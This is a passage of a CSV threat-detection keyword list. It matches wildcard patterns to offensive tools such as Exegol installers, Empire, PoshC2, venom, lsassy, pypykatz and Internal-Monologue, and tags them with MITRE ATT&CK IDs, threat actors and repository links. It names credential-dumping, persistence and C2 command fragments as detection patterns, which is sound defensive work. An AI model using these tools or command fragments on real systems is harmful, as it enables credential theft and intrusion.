?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_ldapdomaindump*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_ldaprelayscan*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_ldapsearch-ad*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_lnkup*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_lsassy*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_manspider*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_mitm6_pip*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_noPac*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_ntlmv1-multi*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_oaburl*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_PassTheCert*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_pcredz*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_petitpotam*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_pkinittools*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_polenum*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_privexchange*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_pth-tools*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_pygpoabuse*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_pykek*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_pylaps*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_pypykatz*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_pywhisker*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_pywsus*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_responder*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_roastinthemiddle*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_ruler*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_rusthound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_shadowcoerce*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_smartbrute*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_smbmap*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_smtp-user-enum*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_sprayhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_targetedKerberoast*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_webclientservicescanner*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_windapsearch-go*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_winrar_wine32.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*install_winrar_wine64.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*install_zerologon*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*installexe-persistence*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Install-Module ps2exe*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*install-persistence*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*install-persistence-cron*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Install-ServiceBinary*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Install-SSP -Path*.dll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Install-SSP.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Install-SSP.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*interactsh -*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C10,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,0,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*interactsh*.exe,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C9,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*interactsh*oast.*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C14,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*interactsh-client -*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C11,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,0,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*interactsh-server -*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C13,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,0,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*Intercepter-NG*,offensive_tool_keyword,Intercepter-NG,android wifi sniffer,T1433,TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/intercepter-ng,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--interface * --wpad --lm --disable-ess*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Internal-Monologue.exe*,offensive_tool_keyword,Internal-Monologue,Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS,T1003 - T1051 - T1574 - T1110 - T1547,TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/eladshamir/Internal-Monologue,1,1,N/A,N/A,10,1283,243,2018-10-11T12:13:08Z,2017-12-09T05:59:01Z -*InternalMonologueDll*,offensive_tool_keyword,Internal-Monologue,Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS,T1003 - T1051 - T1574 - T1110 - T1547,TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/eladshamir/Internal-Monologue,1,1,N/A,N/A,10,1283,243,2018-10-11T12:13:08Z,2017-12-09T05:59:01Z -*InternalMonologueExe*,offensive_tool_keyword,Internal-Monologue,Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS,T1003 - T1051 - T1574 - T1110 - T1547,TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/eladshamir/Internal-Monologue,1,1,N/A,N/A,10,1283,243,2018-10-11T12:13:08Z,2017-12-09T05:59:01Z -*InternetCrackUrl*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*IntruderPayloads*,offensive_tool_keyword,IntruderPayloads,A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.,T1101 - T1114 - T1324 - T1559,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/1N3/IntruderPayloads,1,0,N/A,N/A,10,3429,1190,2021-09-27T01:47:05Z,2015-10-29T14:57:06Z -*invalid certificate signing key*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*invalid elliptic curve value*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*-Inveigh *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 